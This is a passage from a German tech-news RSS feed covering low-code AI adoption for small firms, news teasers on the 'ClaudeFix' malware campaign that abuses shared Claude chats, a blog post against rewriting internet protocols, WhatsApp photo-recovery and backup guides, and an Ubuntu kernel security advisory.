<li><strong>Angebotsmanagement:</strong> Eine Kundenanfrage geht per E-Mail ein, KI extrahiert den Leistungsumfang, prüft gegen Preislisten, generiert einen Angebotsentwurf und leitet ihn zur Freigabe an einen Sachbearbeiter weiter. Der Kunde bekommt sein Angebot schneller, die Bearbeitung kostet weniger Zeit. Dabei ist kein ERP-Modul beteiligt – und es fällt keine siebenstellige Projektsumme an.</li>



<li><strong>Mandantenpost bei Steuerberatern:</strong> Eingehende Dokumente werden nach Typ und Dringlichkeit klassifiziert und Zuständigkeiten zugewiesen. Was in Kanzleien mit hohem Postaufkommen täglich zu Engpässen führt, lässt sich so als regelbasierter Workflow abbilden – ganz ohne großes DATEV-Einführungsprojekt.</li>
</ul>



<h2 class="wp-block-heading">Woran Low-Code und KI scheitern – und wie Sie das verhindern</h2>



<p class="wp-block-paragraph">Das größte operative Risiko bei Low-Code-Projekten ist Schatten-IT, beziehungsweise <a href="https://www.computerwoche.de/article/4172297/warum-shadow-ai-trotz-governance-weiter-wachst.html" target="_blank">-KI</a>. So hat der Digitalverband Bitkom in <a href="https://www.bitkom.org/Presse/Presseinformation/Beschaeftigte-nutzen-Schatten-KI" target="_blank" rel="noreferrer noopener">einer Befragung vom Oktober 2025</a> herausgefunden, dass <strong>17 Prozent</strong> der Umfrageteilnehmer davon ausgehen, dass ihre Mitarbeiter KI-Tools über private Accounts dienstlich nutzen. Bei weiteren <strong>17 Prozent</strong> gab es diesbezüglich vereinzelte Fälle – und bei <strong>acht Prozent</strong> ist dieses Gebaren weit verbreitet. Sind in einem solchen Fall Kundendaten im Spiel, handelt es sich um einen DSGVO-Verstoß ohne Auftragsverarbeitungsvertrag als Grundlage. Insofern braucht eine Low-Code-Strategie klare Nutzungsrichtlinien – ansonsten tauscht man ein ERP-Risiko gegen ein Compliance-Risiko, was eher kein Fortschritt wäre.</p>



<p class="wp-block-paragraph">Darüber hinaus können Low-Code-Plattformen bei hochspezialisierten Logikstrukturen (mehrstufige Produktionsplanung, Konzernkonsolidierung, ISO-zertifizierte Auditpfade) an strukturelle Grenzen stoßen. Und: Der Vendor Lock-in ist real – proprietäre Plattformen lassen sich schlecht migrieren. Hier haben Open-Source- und Self-Hosting-Lösungen einen strukturellen Vorteil. Allerdings ist auch das kein Garant dafür, dass Abhängigkeiten künftig ausbleiben. </p>



<p class="wp-block-paragraph">Vor diesem Hintergrund empfehle ich Mittelständlern, sich an den folgenden drei Schritten zu orientieren, um ihre Low-Code-KI-Ambitionen nachhaltig zu verwirklichen.</p>



<ol class="wp-block-list">
<li><strong>Pilotprozess nach harten Kriterien wählen: </strong>Der erste Kandidat sollte vier Kriterien gleichzeitig erfüllen: hohes Volumen, klare fachliche Regeln, keinen schreibenden Zugriff auf das ERP in der ersten Ausbaustufe, und einen Verantwortlichen, der den Prozess heute schon im Detail kennt. Die Bereiche Rechnungseingang und Angebotsvorbereitungerfüllen diese Voraussetzungen fast immer. Ein Prozess, der gleichzeitig produktionskritisch und schlecht dokumentiert ist, hingegen fast nie. Wer an dieser Stelle den falschen Piloten wählt, muss damit rechnen, dass die Akzeptanz bei einem zweiten Versuch deutlich geringer ist.</li>



<li><strong>Datenschutz vor dem ersten Workflow klären:</strong> Ein Auftragsverarbeitungsvertrag mit dem Modellanbieter ist eine Sache, die vor dem Produktivstart stehen sollte, nicht in der Nachbereitung. Diese Prüfung muss auch mit Blick auf die Low-Code-Plattform selbst erfolgen, nicht nur das Sprachmodell dahinter. Wer hier sauber arbeitet, nimmt der eingangs beschriebenen Schatten-IT-Problematik die Grundlage: Wenn die offizielle Lösung schneller einsatzbereit ist als die inoffizielle, greifen Mitarbeiter auch seltener auf private KI-Accounts zurück.</li>



<li><strong>Skalierungsgrenze vorab definieren:</strong> Legen Sie fest, ab welchem Komplexitätsgrad ein Prozess zurück auf die ERP-Roadmap wandert, bevor Sie ihn brauchen. Diese Grenze nachträglich einzuziehen, kostet – inmitten eines gewachsenen Workflows mit zwölf Verzweigungen – mehr Zeit als die ursprüngliche ERP-Entscheidung eingespart hat. Ein einfaches Signal funktioniert in der Praxis gut: Sobald ein Workflow mehr als drei verschachtelte Bedingungen benötigt, um eine einzelne Entscheidung abzubilden, sollte die Logik überprüft – nicht erweitert – werden.</li>
</ol>



<h2 class="wp-block-heading">Der eigentliche Nutzwert für KMU</h2>



<p class="wp-block-paragraph">Sechs Monate weniger Implementierungszeit bedeutet nicht nur sechs Monate früher produktiv sein zu können. Es bedeutet:</p>



<ul class="wp-block-list">
<li>Ergebnisse demonstrieren zu können, bevor das ERP-Budget freigegeben ist.</li>



<li>Prozesse testen zu können, bevor sie skaliert werden.</li>



<li>Scheitern zu können, weil es um einen Workflow für 4.000 Euro und nicht um ein Projekt für 200.000 Euro geht.</li>
</ul>



<p class="wp-block-paragraph">Ihr ERP-Projekt darf ruhig auf der Roadmap bleiben. Aber für die nächsten zwölf Monate gibt es meistens einen schnelleren Weg. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag wurde im Rahmen des deutschsprachigen Experten-Netzwerks von Foundry veröffentlicht. Lust mitzumachen? </strong><a href="https://www.computerwoche.de/experten/" target="_blank"><strong>Jetzt bewerben</strong></a><strong>!</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClaudeFix-Malware: Cyberangriffe über Claude Shared Chats und ClickFix-Befehle]]></title>
<description><![CDATA[Aus Sicht der IT-Sicherheit sollte kein Kommando allein deshalb als sicher gelten, weil es innerhalb eines KI-Chats, eines Entwicklerforums oder einer ...]]></description>
<link>https://tsecurity.de/de/3684895/it-security-nachrichten/claudefix-malware-cyberangriffe-ueber-claude-shared-chats-und-clickfix-befehle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684895/it-security-nachrichten/claudefix-malware-cyberangriffe-ueber-claude-shared-chats-und-clickfix-befehle/</guid>
<pubDate>Tue, 21 Jul 2026 23:42:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aus Sicht der <b>IT</b>-<b>Sicherheit</b> sollte kein Kommando allein deshalb als sicher gelten, weil es innerhalb eines KI-Chats, eines Entwicklerforums oder einer ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Martin Thompson: Why in Building Protocols, Like Code, Starting Over Is Dumb]]></title>
<description><![CDATA[Today, the IETF held the CURRENT BoF,
where the goal was to develop a new protocol.
That protocol would be substantially like TLS,
reusing its record layer and basic structure,
but it would drop in MLS for key exchange.
This is somewhere between a pretty bad idea
and a horrible idea.
The wholesal...]]></description>
<link>https://tsecurity.de/de/3684807/tools/martin-thompson-why-in-building-protocols-like-code-starting-over-is-dumb/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684807/tools/martin-thompson-why-in-building-protocols-like-code-starting-over-is-dumb/</guid>
<pubDate>Tue, 21 Jul 2026 22:58:58 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Today, the IETF held the CURRENT BoF,
where the goal was to develop a new protocol.
That protocol would be substantially like TLS,
reusing its record layer and basic structure,
but it would drop in MLS for key exchange.</p>
<p>This is somewhere between a pretty bad idea
and a horrible idea.</p>
<p>The wholesale replacement of a huge chunk of protocol architectures
is a hallmark of a lot of the AI-generated protocol proposals
that have flooded the IETF.
A small blemish is identified,
then the fix is a whole new protocol,
or a major piece of surgery.
No regard for the wisdom of Chesterton’s Fence
or the accumulated knowledge and usefulness embodied in what exists.</p>
<p>Experienced engineers know that rewriting a code module
is not something you do lightly.
There’s lots of literature out there about why this is a bad idea generally,
and some emerging discussion about how AI might just change that.</p>
<p>The reasons not to rewrite a software component still largely apply
to a protocol component.
The reasons that AI might make it easier to do that safely, less so.
Protocols are different.</p>
<h3>Wholesale Change Will Miss Use Cases</h3>
<p>Just like with a code change,
a protocol component that changes will miss use cases
that people really care about.</p>
<p>The usual concerns with code apply:</p>
<ul>
<li>The existing features you know about and can test for
can be handled.</li>
<li>The existing problems you know and care about can be fixed.</li>
<li>You inevitably introduce brand-new problems.</li>
<li>The existing features you don’t know about
get lost.</li>
</ul>
<p>Unlike code changes, you probably don’t have a test case
for existing features that you didn’t know about.
We found that with HTTP/2,
where a number of use cases got lost in the process
of “upgrading” HTTP.</p>
<p>In HTTP/1.1,
performing client authentication
in the middle of request was possible.
Losing that capability in HTTP/2
affected few enough people
that it was not badly damaging for the ecosystem.
It still sucked.</p>
<p>A lot of work was done to try to find these issues,
but we did not learn about these problems until fairly late in the process.</p>
<p>Proposing a protocol change means asking a whole lot of other people,
many of whom are not invested in your goals,
to do that work.</p>
<p>Changing a protocol by replacing a chunk of it,
no matter how much care is taken,
either asks the entire ecosystem to change with you.</p>
<p>That means asking everyone to move with you.
If they don’t, you are not changing the protocol,
you are forking it.</p>
<h3>Forking A Protocol Destroys Interoperability</h3>
<p>The real value of having a protocol like TLS
is that a great many things can all talk to each other.</p>
<p>Forking a protocol –
and sometimes profiling a protocol, a subject for another post –
destroys that.
You now have two ways to achieve the same goal,
and a choice to join one of two clubs.
You can join both, but that means constantly translating back and forth,
something that can only get harder over time
as protocol semantics diverge.</p>
<p>And yes, in case you were asking,
this applies to the entirety of the IETF IoT sphere,
which has parallel HTTP, TLS, and other analogues.
Ostensibly, these address the needs of highly constrained hardware,
but the cost is an ecosystem cut off from the mainstream.</p>
<h3>But Fixing Protocols Is Hard</h3>
<p>Yes, existing protocols come with baggage
or technical debt.
Maybe they aren’t perfectly optimized for your use.</p>
<p>The value that an existing protocol carries
is that you are sharing the burden of its maintenance
with a great many more people.
Fixing it, maybe by adding extensions to support your needs,
comes with opportunities to improve the protocol
even beyond that immediate need.
Every change is a chance to work off some of the accumulated cruft.</p>
<p>Major refreshes, like the TLS 1.3 reworking,
cleared out a ton of cruft in the process.
You get to benefit from the work that others do to improve that protocol too.</p>
<h3>Do the Work</h3>
<p>It is hard to be a responsible steward for the fabric of the Internet.
We do it because it is worthwhile.
Ignoring the lessons of the past is not helpful.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wenn geteilte KI-Chats zur Malware-Falle werden - Netzpalaver]]></title>
<description><![CDATA[Wenn geteilte KI-Chats zur Malware-Falle werden. 21. Juli 2026. AI als Hacker. Das Threat-Hunting-Team von Zscaler analysierte eine neue Malware ...]]></description>
<link>https://tsecurity.de/de/3684426/hacking/wenn-geteilte-ki-chats-zur-malware-falle-werden-netzpalaver/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684426/hacking/wenn-geteilte-ki-chats-zur-malware-falle-werden-netzpalaver/</guid>
<pubDate>Tue, 21 Jul 2026 18:55:00 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn geteilte KI-Chats zur Malware-Falle werden. 21. Juli 2026. AI als <b>Hacker</b>. Das Threat-Hunting-Team von Zscaler analysierte eine neue Malware ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Server Update Services: WSUS leidet unter massiven Leistungsausfällen]]></title>
<description><![CDATA[Parallel endet der Support für SQL Server 2016, während WSUS-Probleme auftreten. Microsoft stellt SaRA ein: Neue Ära für Diagnose-Tools beginnt.]]></description>
<link>https://tsecurity.de/de/3684278/windows-server/windows-server-update-services-wsus-leidet-unter-massiven-leistungsausfaellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684278/windows-server/windows-server-update-services-wsus-leidet-unter-massiven-leistungsausfaellen/</guid>
<pubDate>Tue, 21 Jul 2026 18:03:18 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel endet der Support für SQL <b>Server</b> 2016, während WSUS-Probleme auftreten. Microsoft stellt SaRA ein: Neue Ära für Diagnose-Tools beginnt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wenn geteilte KI-Chats zur Malware-Falle werden - Netzpalaver]]></title>
<description><![CDATA[Tags:ClaudeFixClickFixCybersicherheitEntwicklerKI ... Warum traditionelles Trainings zur Cybersicherheit im KI-Zeitalter nicht mehr greifen ...]]></description>
<link>https://tsecurity.de/de/3684213/it-security-nachrichten/wenn-geteilte-ki-chats-zur-malware-falle-werden-netzpalaver/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684213/it-security-nachrichten/wenn-geteilte-ki-chats-zur-malware-falle-werden-netzpalaver/</guid>
<pubDate>Tue, 21 Jul 2026 17:39:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tags:ClaudeFixClickFix<b>Cybersicherheit</b>EntwicklerKI ... Warum traditionelles Trainings zur <b>Cybersicherheit</b> im KI-Zeitalter nicht mehr greifen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT statt Google-Suche: Wie Marketing-Teams auf den Wandel im Nutzerverhalten reagieren sollten]]></title>
<description><![CDATA[KI-Assistenten sind die neuen Zugangspunkte im Netz. Für Werbetreibende bedeutet dies: Sie müssen dort präsent sein. Kostenpflichtige Anzeigen in KI-Chats sind weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3683945/it-nachrichten/chatgpt-statt-google-suche-wie-marketing-teams-auf-den-wandel-im-nutzerverhalten-reagieren-sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683945/it-nachrichten/chatgpt-statt-google-suche-wie-marketing-teams-auf-den-wandel-im-nutzerverhalten-reagieren-sollten/</guid>
<pubDate>Tue, 21 Jul 2026 16:03:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Assistenten sind die neuen Zugangspunkte im Netz. Für Werbetreibende bedeutet dies: Sie müssen dort präsent sein. Kostenpflichtige Anzeigen in KI-Chats sind <a href="https://t3n.de/news/chatgpt-statt-google-suche-marketing-1736564/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Whatsapp-Fotos gelöscht: So stellen Sie Bilder und Videos wieder her]]></title>
<description><![CDATA[Gelöschte Whatsapp-Fotos und -Videos lassen sich in vielen Fällen wiederherstellen – über das lokale Dateisystem, ein Google-Drive-Backup oder die iCloud. Welche Methode für Sie die richtige ist, hängt von Ihrem Betriebssystem ab und davon, ob Sie Whatsapp-Backups aktiviert haben. Wir führen Sie ...]]></description>
<link>https://tsecurity.de/de/3683896/windows-tipps/whatsapp-fotos-geloescht-so-stellen-sie-bilder-und-videos-wieder-her/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683896/windows-tipps/whatsapp-fotos-geloescht-so-stellen-sie-bilder-und-videos-wieder-her/</guid>
<pubDate>Tue, 21 Jul 2026 15:43:50 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Gelöschte Whatsapp-Fotos und -Videos lassen sich in vielen Fällen wiederherstellen – über das lokale Dateisystem, ein Google-Drive-Backup oder die iCloud. Welche Methode für Sie die richtige ist, hängt von Ihrem Betriebssystem ab und davon, ob Sie Whatsapp-Backups aktiviert haben. Wir führen Sie Schritt für Schritt durch alle Optionen.</p>



<h2 class="wp-block-heading toc">Schnell-Check: Ist das Bild wirklich weg?</h2>



<p>Bevor Sie aufwendige Wiederherstellungsversuche starten, sollten Sie zuerst zwei kurze Checks durchführen. Manchmal ist die Lösung nämlich viel einfacher, als wir denken:</p>



<ul class="wp-block-list">
<li><strong>Galerie prüfen:</strong> Öffnen Sie Ihre Fotos- oder Galerie-App und suchen Sie dort nach dem Album “Whatsapp” oder “Whatsapp Images”. In manchen Fällen wird ein Bild nur im Chat nicht mehr angezeigt, ist aber noch vollständig im Speicher Ihres Handys vorhanden. Voraussetzung ist, dass die automatische Medienspeicherung in Whatsapp aktiviert ist. Mehr dazu in unserem Artikel <a href="https://www.pcwelt.de/article/2982577/whatsapp-speicher-aufraeumen-dateien-sicher-loeschen-android-ios.html" target="_blank" rel="noreferrer noopener">Whatsapp-Speicher aufräumen: So löschen Sie unnötige Dateien sicher</a>.</li>



<li><strong>Erneut herunterladen:</strong> Öffnen Sie den betreffenden Whatsapp-Chat. Falls Sie anstelle des Bildes nur eine verschwommene Vorschau mit einem Download-Pfeil sehen, tippen Sie darauf. Whatsapp lädt das Bild erneut von seinen Servern, sofern es noch nicht zu lange zurückliegt.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a5f77805b291"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/WhatsApp-Image-2026-07-02-at-3.20.18-PM.jpeg?quality=50&amp;strip=all" alt="Whatsapp-Bilder im Chat erneut herunterladen" class="wp-image-3183566" width="1024" height="1077" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Gelöschte Whatsapp-Fotos: Wenn das Bild im Chat verschwommen ist, können Sie es per Antippen noch einmal herunterladen.</p>
</figcaption></figure><p class="imageCredit">PC-Welt</p></div>



<p>Bleibt das Bild trotz der Checks unauffindbar, haben Sie noch weitere Möglichkeiten. Die wichtigsten stellen wir Ihnen in den folgenden Abschnitten vor.</p>



<h2 class="wp-block-heading toc">Methode 1: Dateisystem durchsuchen (Android)</h2>



<p>Auch wenn ein Bild aus dem Whatsapp-Chat gelöscht wurde und nicht mehr in der Galerie auftaucht, kann es sich noch im Dateisystem des Smartphones befinden. Auf Android legt Whatsapp Mediendateien im internen Speicher unter folgendem Pfad ab: <strong>Interner Speicher → Android → media → com.whatsapp → WhatsApp → Media → WhatsApp Images</strong>. Für Videos schauen Sie entsprechend im Ordner “WhatsApp Video” nach.</p>



<p>Um in diesen Ordner zu gelangen, benötigen Sie einen Dateimanager. Auf neueren Android-Versionen reicht dafür oft die vorinstallierte App <a href="https://play.google.com/store/apps/details?id=com.google.android.apps.nbu.files&amp;hl=de" target="_blank" rel="noreferrer noopener">Dateien</a> aus, alternativ funktionieren kostenlose Apps wie der <a href="https://play.google.com/store/apps/details?id=com.ghisler.android.TotalCommander&amp;hl=de" target="_blank" rel="noreferrer noopener">Total Commander</a> aus dem Play Store. Gehen Sie dann so vor:</p>



<ol class="wp-block-list">
<li>Öffnen Sie die App <strong>Dateien</strong> oder einen Dateimanager Ihrer Wahl.</li>



<li>Navigieren Sie zu <strong>Interner Speicher → Android → media → com.whatsapp → WhatsApp → Media</strong>.</li>



<li>Öffnen Sie den Ordner <strong>Whatsapp Images</strong> für Fotos oder <strong>WhatsApp Video</strong> für Videos.</li>



<li>Suchen Sie dort nach der gewünschten Datei und kopieren Sie sie an einen sicheren Ort.</li>
</ol>



<p><strong>Wichtig:</strong> Diese Methode funktioniert nur, wenn das Bild zwar aus dem Chatverlauf entfernt, aber die lokal gespeicherte Kopie noch nicht überschrieben wurde. Je länger Sie warten, desto unwahrscheinlicher wird ein Erfolg.</p>



<h2 class="wp-block-heading toc">Methode 2: Backup wiederherstellen (Android &amp; iPhone)</h2>



<p>Wenn das Bild weder in der Galerie noch im Dateisystem zu finden ist, bleibt der Weg über ein Backup. Whatsapp sichert Chats und Mediendateien regelmäßig automatisch – auf Android in Google Drive und auf dem iPhone in der iCloud. Entscheidend ist, dass das Backup vor dem Löschen des Bildes erstellt wurde.</p>



<p>Prüfen Sie zunächst, wie weit das letzte Backup zurückliegt: Öffnen Sie Whatsapp und navigieren Sie zu <strong>Einstellungen → Chats → Chat-Backup</strong>. Dort sehen Sie Datum und Uhrzeit der letzten Sicherung. Liegt dieses Datum vor dem Zeitpunkt, an dem das Bild gelöscht wurde, sind Ihre Chancen gut.</p>



<p><strong>Gehen Sie dann so vor:</strong></p>



<ol class="wp-block-list">
<li>Deinstallieren Sie Whatsapp. Halten Sie dazu das App-Symbol gedrückt und tippen Sie auf <strong>Deinstallieren</strong> (Android) oder <strong>App entfernen</strong> (iPhone).</li>



<li>Laden Sie Whatsapp neu herunter und installieren Sie die App.</li>



<li>Melden Sie sich mit Ihrer Telefonnummer an. Whatsapp erkennt das vorhandene Backup automatisch.</li>



<li>Tippen Sie auf <strong>Wiederherstellen</strong>, um Chats und Medien zurückzuholen.</li>
</ol>



<p><strong>Achtung:</strong> Alle Nachrichten und Medien, die nach dem letzten Backup eingegangen sind, gehen bei diesem Vorgang verloren.</p>



<h2 class="wp-block-heading toc">Sonderfall: Das Bild wurde “für alle” gelöscht</h2>



<p>Whatsapp erlaubt es, versendete Nachrichten nachträglich bei allen Empfängern zu entfernen. Hat der Absender ein Bild mit “Für alle löschen” entfernt, erscheint im Chat nur noch der Hinweis “Dieses Medium wurde gelöscht”. Weder Backup noch Dateisystem helfen hier weiter, da das Bild nie dauerhaft auf Ihrem Gerät gespeichert wurde.</p>



<p>Eine Ausnahme gibt es: Hatte Ihr Handy das Bild bereits automatisch in der Galerie gespeichert, bevor der Absender es gelöscht hat, ist diese Kopie weiterhin vorhanden. Whatsapp entfernt bei “Für alle löschen” nur die Kopie im Chat, nicht eine bereits in der Galerie gesicherte Version. Mehr zum Thema <a href="https://www.pcwelt.de/article/1195099/whatsapp-trick-geloeschte-nachrichten-trotzdem-lesen.html" target="_blank" rel="noreferrer noopener">Gelöschte Whatsapp-Nachrichten und wie Sie diese trotzdem lesen können, erfahren Sie hier</a>.</p>



<h2 class="wp-block-heading toc">Datenrettungs-Software: Finger weg oder sinnvoll?</h2>



<p>Im Netz werden zahlreiche Tools beworben, die angeblich gelöschte Whatsapp-Fotos direkt aus dem Speicher retten; darunter “Dr.Fone”, “PhoneRescue” oder “Tenorshare UltData”. </p>



<p>Viele werben damit, ohne Root-Zugriff auszukommen. Das stimmt – mit einer wichtigen Einschränkung: Was diese Tools in der Praxis hauptsächlich tun, ist, den Inhalt eines vorhandenen Google-Drive- oder iCloud-Backups auszulesen und selektiv wiederherzustellen. Das ist durchaus praktisch, hilft aber nur, wenn das gesuchte Bild im Backup enthalten war.</p>



<p>Eine echte Wiederherstellung gelöschter Dateien direkt aus dem freien Gerätespeicher (also ohne jegliches Backup) ist auf modernen Android-Geräten durch das Betriebssystem stark eingeschränkt und gelingt in der Praxis selten zuverlässig. Unser Rat: Bleiben Sie skeptisch, denn die Preise für solche Tools sind oft hoch und die Erfolgsaussichten gering.</p>



<h2 class="wp-block-heading toc">So verlieren Sie künftig keine Whatsapp-Medien mehr</h2>



<p>Der zuverlässigste Schutz vor Datenverlust ist und bleibt ein aktuelles Backup. Aktivieren Sie in Whatsapp unter <strong>Einstellungen → Chats → Chat-Backup</strong> die tägliche automatische Sicherung und stellen Sie sicher, dass Ihr Google- oder Apple-Account genug freien Speicher hat. </p>



<p>Zusätzlich empfiehlt es sich, die <strong>automatische Medienspeicherung aktiviert zu lassen</strong>, damit Fotos direkt in der Galerie landen und damit eine zweite Kopie außerhalb des Chats existiert. Bedenken Sie dabei nur, dass das den Speicher schnell füllen kann.</p>



<p><strong>Weiterführender Lesetipp:</strong> <a href="https://www.pcwelt.de/article/2681721/12-neue-whatsapp-funktionen-die-sie-ab-sofort-nutzen-konnen.html" data-type="link" data-id="https://www.pcwelt.de/article/2681721/12-neue-whatsapp-funktionen-die-sie-ab-sofort-nutzen-konnen.html" target="_blank" rel="noreferrer noopener">12 neue Whatsapp-Funktionen, die Sie ab sofort nutzen können</a></p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ – Whatsapp-Medien wiederherstellen </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Wie lange sind Whatsapp-Fotos im Backup verfügbar?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Solange Ihr Google- oder iCloud-Speicher nicht voll ist. Wichtig: Seit Ende 2023 zählen Whatsapp-Backups auf Android zum regulären Google-One-Kontingent und sind nicht mehr kostenlos unbegrenzt.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Kann ich einzelne Bilder aus dem Backup wiederherstellen, ohne alles zurückzusetzen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein. Whatsapp stellt immer das gesamte Backup wieder her, nicht einzelne Dateien.<br></p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Funktioniert die Dateisystem-Methode auch auf dem iPhone?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein. iOS erlaubt keinen direkten Dateizugriff auf Whatsapp-Ordner von außen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Was tun, wenn kein Backup vorhanden ist?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Prüfen Sie zuerst die Galerie und das Dateisystem (Android). Ist das Bild dort ebenfalls nicht mehr vorhanden, sind die Chancen auf Wiederherstellung leider sehr gering.</p>
</div>
</div></div>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nie wieder Chats verlieren: So richtet ihr das WhatsApp-Backup ein]]></title>
<description><![CDATA[Egal, ob ihr euer Handy neu aufsetzt, zu einem anderen Gerät wechselt oder einfach eure Daten absichern wollt – mit der richtigen Backup-Strategie sind eure Chatverläufe, Bilder und Videos bei WhatsApp bestens geschützt.]]></description>
<link>https://tsecurity.de/de/3683413/it-nachrichten/nie-wieder-chats-verlieren-so-richtet-ihr-das-whatsapp-backup-ein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683413/it-nachrichten/nie-wieder-chats-verlieren-so-richtet-ihr-das-whatsapp-backup-ein/</guid>
<pubDate>Tue, 21 Jul 2026 12:48:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Egal, ob ihr euer Handy neu aufsetzt, zu einem anderen Gerät wechselt oder einfach eure Daten absichern wollt – mit der richtigen Backup-Strategie sind eure Chatverläufe, Bilder und Videos bei WhatsApp bestens geschützt.]]></content:encoded>
</item>
<item>
<title><![CDATA[ClaudeFix: Shared Claude Chats Meet ClickFix]]></title>
<description><![CDATA[2026-07-15 • Zscaler
     • Ruchna Nigam
     • osx.macsync
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3683379/malware-trojaner-viren/claudefix-shared-claude-chats-meet-clickfix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683379/malware-trojaner-viren/claudefix-shared-claude-chats-meet-clickfix/</guid>
<pubDate>Tue, 21 Jul 2026 12:33:23 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-15 • Zscaler
     • Ruchna Nigam
     • osx.macsync
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/6ddef08b-ace8-4b93-85c1-4a3ac358e916/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8574-1: Linux kernel (GCP FIPS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3683349/unix-server/usn-8574-1-linux-kernel-gcp-fips-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683349/unix-server/usn-8574-1-linux-kernel-gcp-fips-vulnerabilities/</guid>
<pubDate>Tue, 21 Jul 2026 12:16:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

